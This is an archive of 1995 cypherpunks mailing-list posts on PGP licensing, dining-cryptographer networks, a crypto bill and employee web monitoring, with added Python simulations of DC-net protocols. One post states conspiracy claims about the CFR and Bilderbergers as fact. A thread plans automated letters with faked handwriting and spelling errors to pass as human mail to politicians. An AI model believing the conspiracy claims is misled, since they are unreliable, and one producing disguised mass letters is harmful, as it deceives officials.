IDEA are far less clear (and they're clearer for RSAREF than for IDEA,
and I got the impression from what I read somewhere on the net or in the PGP
docs that the initial permission from Ascom-Tech for use of IDEA with PGP was
pretty informal, and that they've been trying to tighten up what's covered.)
(Also RSAREF licenses have changed from version to version, and the
license PKP uses to distribute versions of RSAREF may also have changed?)

Selling software containing the code is pretty clearly commercial.
Non-commercial messages from your personal non-business machine are
clearly non-commercial.  Providing a service of encrypting and decrypting
messages for people for money sounds like it's _very_ probably commercial.
Encrypting and decrypting messages to/from your business that deal with money
are a very gray area.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:20 PDT
To: cypherpunks@toad.com
Subject: Re: Here it is; bi-directional dining cryptographers
Message-ID: <199507180649.XAA25418@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Context: Bidirectional DCnets, Alice and Bob simultaneously transmitting
to each other.  Interesting approach, though you do have to schedule it
somehow.  It's a different take on the uses of DCnets - the original
was for an anonymous-1 to many rather than a 1 to 1 with only the two
participants knowing, though in the first case the recipient can be known
only to the sender if they want to arrange things that way through shared
secrets or whatever.

At 01:31 PM 7/17/95 +0100, Rev. Mark Grant wrote:
>Yes, but presumably it's expected that they would be using secure
>encryption on the messages that they're sending. That might still provide
>some information about the message for traffic analysis, e.g. if you send
>a PGP message you have your key-id at the beginning, and if you knew the 
>keys of all members of the DC-net you could XOR them and see who's 
>talking to who.

Presumably people will use multiple key-ids on the net as well - Alice may
have a general-use "Alice" key, and maybe also a general-use "Medusa" key,
but Alice or Medusa may have also arranged with Bob to use a different key
for traffic where he doesn't mind if she knows he sent it and he doesn't want
anyone else knowing it's being sent to her.  Also, he can do this anonymously,
so she doesn't know either:

        Alice posts Plaintext("Hi, I'm Alice, key AAAA")
        Bob   posts Encrypt(AAAA, "Hi, Alice, I'm Dr. X, Key XXXX, please
                        post a key I can use to talk to you")
        Alice posts Encrypt(XXXX, Signed(AAAA, "Hi, Dr. X, use key AXAX"))

Bob's message lets him send stuff to Alice without anyone, including her,
knowing it's from him, since the name X and key XXXX are new randoms.
Alice signs her response so Dr. X knows that key AXAX will really go to
Alice and not to Mallet who's impersonating Alice; she doesn't really care
who X is.
If traffic analysis is a concern (Alice noticing, for instance, that she's
getting a _lot_ of requests from key AXAX for her remailer to send stuff
to destination ZZZZ), Bob can keep sending her new requests for keys and ids,
and not reuse them more than he thinks is safe.

>I'd have thought the most significant problem would be reserving the
>blocks in an anonymous fashion while not allowing denial-of-service
>attacks. 

Since anybody can send bits at any time, and nobody can tell who without
lots of collusion, you can't prevent denial-of-service (well, I assume not,
unless there's something rather non-obvious in the literature.)
The Bad Guy can decide if it's more fun to jam the reservations or the messages.
What reservation does for you is give you a short inefficient period (with
possible collisions, backoff-and-retry, etc., depending on algorithm) that
you can use to reserve a longer one-user period for message traffic, so you
can spend most of your time talking instead of haggling over interruptions.

One way to do reservations is to use some variant on Slotted Aloha for the
reservation period - for example, everybody picks a random id number for the
session (with odd parity or odd high-bit to make collision detection easier),
waits a random number of slots, and then sends their id number.
If there's a collision, wait and retry, maybe with exponential backoff.
After the first slot that's got data and looks like it doesn't have a collision,
anybody who thinks that it was their number picks a different number,
waits a short random number of slots and posts; first one wins.
(If you're using 32-bit randoms and have fewer than a million players, 
the chances of two undetected collisions in a row are really small,
even if people cheat a bit on their backoffs.)  Winner announces how many
slots he's going to use up for his message, so you know when to start again.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
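
The reservation scheme described in the message above, as an added simulation that is not part of the original post. A DC-net slot is modelled only by what it delivers (the XOR of everything sent in it); the function names, the 4-slot confirmation window and the doubling backoff are assumptions made for this example.

```python
import random

def parity_odd(x):
    """True when x has an odd number of 1 bits."""
    return bin(x).count("1") % 2 == 1

def new_id(rng, bits=32):
    """Random session id forced to odd parity, as the post suggests."""
    x = rng.getrandbits(bits - 1) << 1      # low bit left free for the fix-up
    return x if parity_odd(x) else x | 1

def xor_channel(words):
    """What one DC-net slot delivers: the XOR of every word sent in it."""
    out = 0
    for w in words:
        out ^= w
    return out

def classify(heard):
    """Judge a slot from its content alone, as every listener can."""
    if heard == 0:
        return "idle"
    # An even number of odd-parity ids XORs to even parity: visible collision.
    # An odd number (1, 3, 5, ...) XORs to odd parity, so a 3-way collision
    # passes this check and is caught only by the senders themselves.
    return "clean?" if parity_odd(heard) else "collision"

def reserve(players, rng, bits=32, max_slots=100_000):
    """Run the reservation period; return (winner, slots_used, stats).

    The winner's name is returned only so the simulation can be checked;
    on a real DC-net the other players learn just the winning id.
    """
    ids = {p: new_id(rng, bits) for p in players}
    window = {p: max(2, len(players)) for p in players}
    wait = {p: rng.randrange(window[p]) for p in players}
    contenders, confirming = list(players), False
    stats = {"idle": 0, "collision": 0, "clean?": 0}
    for slot in range(max_slots):
        senders = [p for p in contenders if wait[p] == 0]
        heard = xor_channel(ids[p] for p in senders)
        kind = classify(heard)
        stats[kind] += 1
        # Local check: a sender claims the slot only if it heard its own id.
        claimants = [p for p in senders
                     if kind == "clean?" and ids[p] == heard]
        if confirming and len(claimants) == 1:
            return claimants[0], slot + 1, stats      # first clean post wins
        if claimants and not confirming:
            # "Anybody who thinks that it was their number picks a different
            # number, waits a short random number of slots and posts."
            contenders, confirming = claimants, True
            for p in claimants:
                ids[p] = new_id(rng, bits)
                wait[p] = rng.randrange(4)
            continue
        for p in contenders:
            if p in senders:                 # sent, but did not hear own id
                window[p] *= 2               # exponential backoff
                wait[p] = rng.randrange(window[p])
            else:
                wait[p] -= 1
    raise RuntimeError("no reservation within max_slots")

if __name__ == "__main__":
    names = ["p%d" % i for i in range(8)]    # constructed player list
    print(reserve(names, random.Random(1995)))
```

Running it with a small `bits` value (8, say) shows why the post wants 32-bit ids: short ids make it far more likely that colliding words cancel or imitate a clean slot.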





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:25 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507180649.XAA25423@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:06 PM 7/17/95 +0200, Hadmut Danisch wrote:
>1. If the bill becomes law, how can someone who violates it be
>punished? 
Only by violating the Constitution and basic common sense,
but that doesn't usually bother the Government very much...

>2. Does someone who publishes software which encodes or encrypts 
>(ASCII is a code, isn't it?) have to prove that he has provided the
>universal decoder to the state or does the state have to prove that he
>didn't do? 

It's not defined in the law, and if the good Senator writes stupid offensive
laws which are so stupid that they have big holes in them like this,
I don't intend to correct him :-)

>In the former case, does he get any receipt from the department of
>justice and what does the receipt say (1.3MByte of software
>received...)?

Nobody knows.

>In the latter case, how do they want to prove he didn't? If he gave
>just a big 
>  for(i=0;;i++) try_key(i);
>how do they want to prove this doesn't work?  [... halting problem...]

The proposed law doesn't say that the mechanism has to decrypt the
message in a short period of time.  If the law passes, I'll be happy to help
write the PGP Universal Decoder program for anybody who needs it to take to
court.  Some kinds of program are affected by the Halting Problem; other kinds
are easy to show that they halt.  For the PGP Universal Decoder,
trial division can find the factors for an N-bit key in much less than
2**N tries, if you program it well, and you know it will halt by then,
if the Universe hasn't decayed first.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:52:17 PDT
To: Phil Fraering        <futplex@pseudonym.com
Subject: Re: bi-directional dining cryptographers
Message-ID: <199507180649.XAA25432@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 PM 7/17/95 -0500, Phil Fraering wrote:
>I'd also like to point out that this system indicates that during
>an attack/disruption on a traditional dc-net, the disruptor can 
>tell what the original person was trying to send, even though no one
>else can.
>
>And then perhaps XOR the data with something offensive, and if the
>original sender tries to re-send, broadcast the result of the XOR,
>resulting in a total net output of the offensive material.

That's difficult - you have to identify that the sender is sending
the same message while the message is being sent, rather than
one or two bit-times later, and you can't fake encryption with an
unknown keyid or digital signatures.  (Digital signatures aren't
something everybody would use very often on a DC-net, since the purpose
of the net is to be anonymous, but since you can do anonymous broadcasts,
you can anonymously post a signature key for your nym if you want to.)

Also, there's no need to combine jamming and posting an offensive message;
they both work well separately.  I suppose you could do that if you only
want to harass the net a bit (e.g. replace all traffic to remailer X
with new remail to whitehouse.gov, or replace all postings from
Cancelmoose with complaints about censorship), but basically DCnets
degrade rapidly if the social structure of the net members does.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Mon, 17 Jul 95 15:46:08 PDT
To: cypherpunks@toad.com
Subject: Safford's Nemesis
Message-ID: <Pine.HPP.3.91.950718003511.2899A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Kahn (1962) doesn't really explain why vital Magic intercepts and
the 'winds' execute did not prevent the Pearl Harbour disaster. 

I just read 'Infamy' by John Toland (1982), containing 'proof'
- very convincing, in my opinion - of the Pearl Harbour cover-up.
The US president, selected members of his cabinet and a
few admirals and generals knew - from Magic and the 'winds'
execute, radio traffic analysis, diplomatic sources, double
agents - exactly when and where the Japanese were going to
attack, but didn't warn Hawaii, fearing that too efficient
counter-measures by the Oahu military might make the attack
abort and so not convince the isolationists. The unexpected 
tactical capabilities of the Japanese armada then made a
cover-up all the more important.

What has been revealed since? Are the views in Toland's book
now 'official', established history, or what?

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@PrimeNet.Com>
Date: Mon, 17 Jul 95 21:44:44 PDT
To: tim werner <werner@mc.ab.com>
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <9507171938.AA03018@mondo.ab.com>
Message-ID: <Pine.BSI.3.91.950718041341.3919A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


   CFR = Council on Foreign Relations which consists of two levels of 
membership, about 3000 in the lower level and 500 in the "secret" inner 
sanctum. you can not ask to join the CFR, you are asked.  There are 
minutes of the meetings, nor are guests welcome.  The membership includes 
bankers (big time bankers only), powerful politicians, but the bulk of 
the membership is made of the OLD money crowd,,, Harvard (Delphi, Fly, 
Phoenix, etc) and Yale (Skull and Bones).  This is where the power in 
America "sleeps" and controls US policy, who is going to be elected, 
etc.  For instance: both Clinton and Bush are members.
   A second similar organization is the Tri-Lateral commission which has 
been dominated and funded by David Rockefeller (Chairman of Chase 
Manhattan Bank). There is a great deal of "selective" overlap in the two 
memberships.
   and, there is an even more select and far more secret top level at the 
global level: The Bilderbergers  --it's secret enough that no one knows 
the total membership.

   there are others such as Baron de Rothschild's bankers group which 
includes the central bank chairmen of all the major countries which have 
semi-autonomous central banks like our Federal Reserve.  This group is 
ultimately the most dangerous since they have the power to print money 
--funny money when their respective governments need a little debt 
financing. 

-----------------original ---------------------

On Mon, 17 Jul 1995, tim werner wrote:

> >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT)
> >From: attila <attila@PrimeNet.Com>
> 
> >and, conspiracy theories notwithstanding, we the people do not govern 
> >America --we are only given a short list of politicians who have sold 
> >their soul to CFR's satanist inner circle.
> 
> What's CFR?
> 
> 
> tw
> 
> -- 
> 
> Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!
> 

--
Ask not what your country can do for you. Do it yourself!
____________________________________________________________________________
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|gc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
____________________________________________________________________________
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365

 "the slammer and the firing squad are just stones on the road to freedom."
	--attila

 "In nature, stupidity gets you killed.
   In the workplace, it gets you promoted.
    In politics, it gets you re-elected."
        --attila

 "Go not unto Usenet for advice, for the inhabitants will say 
   yes, and no, and maybe, and I don't know, and fuck off, and...."
	--attila

                | The pen may often be mightier than the sword,
 *<%%%%%%%%%%%%|+>-================================-------------------
                | but, the sword sure as hell is faster....

"If I wanted your opinion, I would have asked for it -in triplicate" 
	--attila
____________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 17 Jul 95 22:45:09 PDT
To: nsb@fv.com
Subject: Zimmerman legal fund
Message-ID: <199507180545.HAA13402@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



I just received a bit of mail asking about the Zimmermann Legal
Defense Fund, which, like many folks out there, I support.  The writer
implied that he might give money because I suggest it in my sig, but
expressed questions about its legitimacy, and questioned if it's "just
someone trying to exploit the Zimmermann case"

Could someone in the know talk about the relationship between FV and
the ZLDF? I don't like to spread misinformation, so I won't answer
based on conjectures.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 18 Jul 95 08:01:38 PDT
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: Zimmerman legal fund
Message-ID: <9507181501.AA11591@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>I just received a bit of mail asking about the Zimmermann Legal
>Defense Fund, which, like many folks out there, I support.  The writer
>implied that he might give money because I suggest it in my sig, but
>expressed questions about its legitimacy, and questioned if it's "just
>someone trying to exploit the Zimmermann case"
>
>Could someone in the know talk about the relationship between FV and
>the ZLDF? I don't like to spread misinformation, so I won't answer
>based on conjectures.
>


I had similar concerns last month, so I emailed the following to 
csn.net!dubois ("Philip L. Dubois")

> 
> Could you please inform me of the financial status of the fund 
> raising for the Phil Zimmermann case?  How much money has been 
> collected, and how much has been spent, and what are the future 
> anticipated expenses?  I might like to contribute, but "a normally 
> unreliable source" has claimed to me that something on the order of 
> $50,000 has been spent, and there is not even an indictment yet.  
> Is this true and is this reasonable?  Is it true that some/all of
> his legal services are being done "pro bono" (I hope I got that phrase
> correct, maybe I should just say "for free")
> 
> If you choose to reply, may I have permission to make your reply public?
> 
> Rick F. Hoselton  (who doesn't claim to present opinions for others)
> 


I got back the following reply:
> 

>Mr. Hoselton--
>
>Since the government has not yet decided whether to indict Mr. Zimmermann,
>or at least hasn't told us its decision if it has made one, we continue to
>accept donations to the Zimmermann Legal Defense Fund.  I've never added up
>the total amount of all donations to date, but I doubt that it would be in
>the neighborhood of $50,000.  I can tell you that several lawyers have been
>working on the case and that all of them but me have done so pro bono, which
>means that they have not been paid.  Since I have been lead counsel and
>have therefore had primary responsibility for the defense, I have not been
>pro bono, at least not entirely; I have not billed for much of my time.  We
>have no way of knowing how long this case will go on.  The government could
>tell us today that it won't indict, in which case it will be all over, or it
>could indict very soon, or it could do nothing until June of 1996 when the
>statute of limitations expires.
>
>You have my permission to make my reply public.
>
>Philip L. Dubois
>Counsel for Philip Zimmermann
>
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Tue, 18 Jul 95 02:14:42 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <9507180840.AA14290@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>> >and, conspiracy theories notwithstanding, we the people do not govern 
>> >America --we are only given a short list of politicians who have sold 
>> >their soul to CFR's satanist inner circle.
>> 
>> What's CFR?
>> 
>
>Council on Foreign Relations.

or Code of Federal Regulations.

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Tue, 18 Jul 95 06:12:25 PDT
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com>
Message-ID: <199507181311.JAA06412@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't think there is ever anything wrong with employers
restricting what employees do on any legal or ethical level.
Evolution (a la Bionomics) will sort out the winners and losers.

/hawk


> or "only to these sites". The product also can be configured to log all 
> Web usage by users subjected to its reign of terror. :) WebTrack 


> are always appropriate, and indeed empowering. Neither WebTrack nor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 18 Jul 95 09:28:07 PDT
To: ab411@detroit.freenet.org
Subject: Re: Automated Rant Generators and Letter Generators
Message-ID: <ac312fb403021004f23b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



David Conrad told me he meant for this to go to the whole list, but only
sent it to me by mistake. So here is his post.


At 4:14 PM 7/18/95, David R. Conrad wrote:
>Tim May <tcmay@sensemedia.net> writes:
>>Bart's comments about using Knuth's typographic work are interesting, to
>>the extent that letters need to look handwritten. In the Mac market, it's
>>possible to send in some handwriting samples and get back a font that
>>emulates the handwriting!
>
>I suppose the resulting font has only one form for each letter?  (Although
>I understand that when you send them a sample, you send several instances
>of each letter; a friend was showing me an ad for this.)  The fact that
>each letter is the same every time would be a giveaway.  We need something
>like Metafont, or at least choose from a number of different shapes.
>
>>                                                 ... So, the combination of
>>handwriting fonts, automated rant generators (of varying rabidities), and
>>fax capabilities gives a pretty good start. Using lots of handwriting
>>samples, various other fonts, and a mix of styles in the letters will help.
>
>Another factor that would make it appear more authentic would be spelling
>and grammar errors.  The grammar errors could be built into the rant
>generators (an occasional dangling modifier, an incomplete sentence or two);
>spelling errors could be done by post-processing the output of the rantgens.
>It's important to take into account the different types of spellos that
>occur: commonly misspelled words (aquired, beleive); wrong homophone (their,
>they're, there; two, to, too); transposed letters (transpoesd); near-misses
>on qwerty keyboards (nesr-mosses); and words left out.
>
>--
>David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
>Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
>Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
>No, his mind is not for rent to any god or government.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 18 Jul 95 06:54:02 PDT
To: cypherpunks@toad.com
Subject: Is it legal for commercial companies to use PGP?
Message-ID: <5ZsF9c6w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT) writes:

> As I recall, the following is a correct scenario: a customer can use PGP to
> send credit card numbers to a vendor he's making a personal purchase from,
> but the vendor must use Viacrypt. If the customer is buying something to use
> for business, BOTH  must use Viacrypt.

In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 18 Jul 95 08:38:04 PDT
To: cypherpunks@toad.com
Subject: Re: Here it is; bi-directional dining cryptographers
In-Reply-To: <199507180649.XAA25418@ix3.ix.netcom.com>
Message-ID: <199507181537.JAA28073@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Since anybody can send bits at any time, and nobody can tell who without
> lots of collusion, you can't prevent denial-of-service (well, I assume not,
> unless there's something rather non-obvious in the literature.)


Chaum discusses it a lot in his original DC paper.  In the limit, any
disrupter can be ousted from the Net.  What you do is "trap" the disrupter
by getting all ready to speak and then not saying anything.  (The only reason
that you do not say anything is that you are about to reveal your secret
bits, and anything you say will be traceable to you.  If you don't mind 
getting identified with your words this once then go ahead.)  The disrupter
foolishly blurts out some garbage at that instant and then everyone holds
up their secret bits to see who "lied" about their XOR (who inverted their
output when they weren't supposed to.)
  Of course if all but one or two participants are colluding disrupters
then it will probably be the one or two who are ousted instead of the
disrupters!  But this is sort of the same effect, no?


This presupposes a block-scheduling algorithm, or at least a set-up in which
the disrupter is committed to his output *before* he realizes that his
intended victim is not transmitting.


Are you familiar with the topology of DC-nets-- how anonymity is preserved
relative to two participants as long as there is a "path" of shared bits
between them?  (That is, A shares with B who shares with C, now A and C are
anonymous relative to each other.  Of course if B decides to out them, 
then they are high and dry.  The interesting thing is that if A and C both
start sharing with D, then C is no longer capable of outing them unless he
collaborates with D.)  The result is that each individual participant in a
DC net can increase their level of security just by sharing with a new
partner.  (Of course, if that new guy is a tentacle of the "anti-anon" 
colluders, then the individual has not actually increased their security.
But they have not decreased it either.)

I really like that about DC-net topology--  any two participants can elect
to boost their anonymity-level without needing the other participants'
permission and without increasing the workload on the other participants.


Bryce
signatures follow

    /=============------------        Our e-mail should be
     Bryce Wilcox,  Programmer          Between you and me
     bryce.wilcox@colorado.edu            For "pretty good privacy"
     ------------=============/             Use PGP!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMAvVWJCUT4gUihHlAQGsyQP+IgY/hHMGtj7kYj3eiIVSoSaAkDOPeNYS
YnPLSahNfGPKtd8cOyX4QXlrBKVSUgJS3hrAFxSGspIl36YOFSLloFNK73lk7DaU
JJmfISWJg8nYWzURpNc/VJkcI9u5u30izD5VVUOFXX0jRohBYxjdUFmaLOlY1vu7
1/xVNHCVhZo=
=FIjz
-----END PGP SIGNATURE-----
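
The DC-net mechanics discussed in the message above, as an added example that is not part of the original post or of Chaum's paper: one round of XOR outputs, a trap round that exposes a disrupter, and the "path of shared bits" test for whether two participants stay anonymous to each other. Assumptions: members A to D and the key graph are constructed, all outputs are announced at once (the commitment precondition the post names), and secret bits are opened honestly in the trap.

```python
"""DC-net round, disrupter trap and key-graph anonymity check (added example)."""
import secrets


def deal_keys(edges):
    """One fresh secret bit per key-sharing pair (edge) for a single round."""
    return {frozenset(edge): secrets.randbits(1) for edge in edges}


def honest_output(name, keys, message_bit=0):
    """XOR of every secret bit `name` shares, inverted only when sending a 1."""
    out = message_bit
    for pair, bit in keys.items():
        if name in pair:
            out ^= bit
    return out


def run_round(members, keys, sender=None, message_bit=0, disrupters=()):
    """All members announce at once; returns (announced outputs, XOR of all)."""
    outputs = {}
    for m in members:
        out = honest_output(m, keys, message_bit if m == sender else 0)
        if m in disrupters:
            out ^= 1          # inverted "when they weren't supposed to"
        outputs[m] = out
    total = 0
    for out in outputs.values():
        total ^= out          # every shared bit appears twice and cancels
    return outputs, total


def trap(members, keys, outputs):
    """Open the secret bits of a round in which nobody really transmitted.

    Anyone whose announced output differs from the XOR of their opened bits
    inverted it, which is exactly what a disrupter does.
    """
    return [m for m in members if outputs[m] != honest_output(m, keys)]


def anonymous_pair(edges, a, c, colluders):
    """True while a path of shared bits joins a and c without any colluder."""
    colluders = set(colluders)
    adjacent = {}
    for u, v in edges:
        if u in colluders or v in colluders:
            continue          # colluders know (and can cancel) these bits
        adjacent.setdefault(u, set()).add(v)
        adjacent.setdefault(v, set()).add(u)
    seen, stack = {a}, [a]
    while stack:
        for nxt in adjacent.get(stack.pop(), ()):
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return c in seen


# Constructed sample net: the chain A-B-C from the post, then D as new partner.
MEMBERS = ["A", "B", "C", "D"]
CHAIN = [("A", "B"), ("B", "C")]
WITH_D = CHAIN + [("A", "D"), ("C", "D")]


def demo():
    keys = deal_keys(WITH_D)
    _, clean = run_round(MEMBERS, keys, sender="A", message_bit=1)
    _, jammed = run_round(MEMBERS, keys, sender="A", message_bit=1,
                          disrupters=("C",))
    # Trap round: A reserved the slot but stays silent, C jams anyway.
    trap_keys = deal_keys(WITH_D)
    outputs, noise = run_round(MEMBERS, trap_keys, disrupters=("C",))
    return {
        "clean": clean, "jammed": jammed, "noise": noise,
        "caught": trap(MEMBERS, trap_keys, outputs),
        "chain_vs_B": anonymous_pair(CHAIN, "A", "C", {"B"}),
        "with_D_vs_B": anonymous_pair(WITH_D, "A", "C", {"B"}),
        "with_D_vs_B_and_D": anonymous_pair(WITH_D, "A", "C", {"B", "D"}),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label}: {value}")
```

The trap only works because the secret bits of that one round are sacrificed; a round that carried a real message is never opened.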



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 18 Jul 95 06:46:32 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: WebTrack URL/Contact Info
Message-ID: <9507181346.AA21915@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


The WWW site for Webster Network Strategies and its WebTrack software is
http://www.webster.com/

According to that page:

   How to reach us: 

   E-mail info@webster.com 
   Call (941) 261-5503 
   Fax (941) 261-6549 
   Write to WNS, 1100 5th Avenue South, Suite 308, Naples, FL
   33940 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 18 Jul 95 06:54:01 PDT
To: cypherpunks@toad.com
Subject: SurfWatch for employees (ugh)
Message-ID: <sgTF9c7w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greg Broiles <greg@ideath.goldenbear.com> writes:

> Consistent with the trend towards treating employees like children,
> Webster Network Strategies has announced (but apparently has not
> shipped) a product similar to SurfWatch but aimed at an employment
> environment. The product is called "WebTrack" and supposedly supports

Forcing workers to keep their minds on their work? Shameful...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAu7mN74r4kaz3mVAQEWhgP9FDkAtsbPMVk5/FTCGaImFu7Iqllw0Y55
Rv2gXxVdiYKmK449i1+PQhJvpnLJE5qVRqMeCjhcysrbI/WK9RUDP+6FVenfDjWZ
Kxh385qzNWE1sJTv92ii3g4dbIp7yziePJc9ZH6HqZ9i1MAyQfjEPutNcE5xgLSH
hBUYN0Q1cPE=
=l0BB
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 18 Jul 95 10:00:48 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Automated Rant Generators and Letter Generators
In-Reply-To: <ac312fb403021004f23b@[205.199.118.202]>
Message-ID: <199507181659.JAA10311@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    My motivation in suggesting the use of a pen-plotter to generate
    output was to make the letter appear to come from a flesh and
    blood human who doesn't do computers or even FAX.  Somewhere,
    perhaps from Jim Warren or the EFF, I had heard that the pols
    paid attention to handwritten letters far more than FAXs or
    email or phone calls.  The rant generator-to-postal mail gateway
    might give netters more leverage than we have now.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 18 Jul 95 07:24:11 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: S. 982 Kyl-Leahy(-Grassley) NII Protection Act
In-Reply-To: <199507180318.UAA16624@comsec.com>
Message-ID: <9507181418.AA15335@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I read it and it looks OK -- except, as I said in e-mail to Senators Kyl
and Leahy, we can't let ourselves believe that legislation can keep
computers safe from hackers.  Many of these threats are outside the reach
of US law.  Instead, we need good firewalls, encrypting file systems, etc.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 18 Jul 95 07:21:23 PDT
To: cypherpunks@toad.com
Subject: AYN_ran
Message-ID: <199507181421.KAA00235@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New Yorker, July 24, 1995:


   "Twilight of the Goddess." A critical look at Ayn Rand and
   her work.

      Thirteen years after Rand's death, her books still sell
      more than three hundred thousand copies a year. Not
      since the popular novels of almost a century before,
      bent on refutations of Darwin or God, and offering what
      George Eliot called "a complete theory of life and
      manual of divinity, in a love story," had there appeared
      so vividly accessible and reassuring a guide for the
      cosmically perplexed. As late as 1991, the Library of
      Congress found that a majority of Americans surveyed
      named "Atlas Shrugged" as the book that had most
      influenced their lives, after the Bible.



   AYN_ran   [About 57K, in three parts]










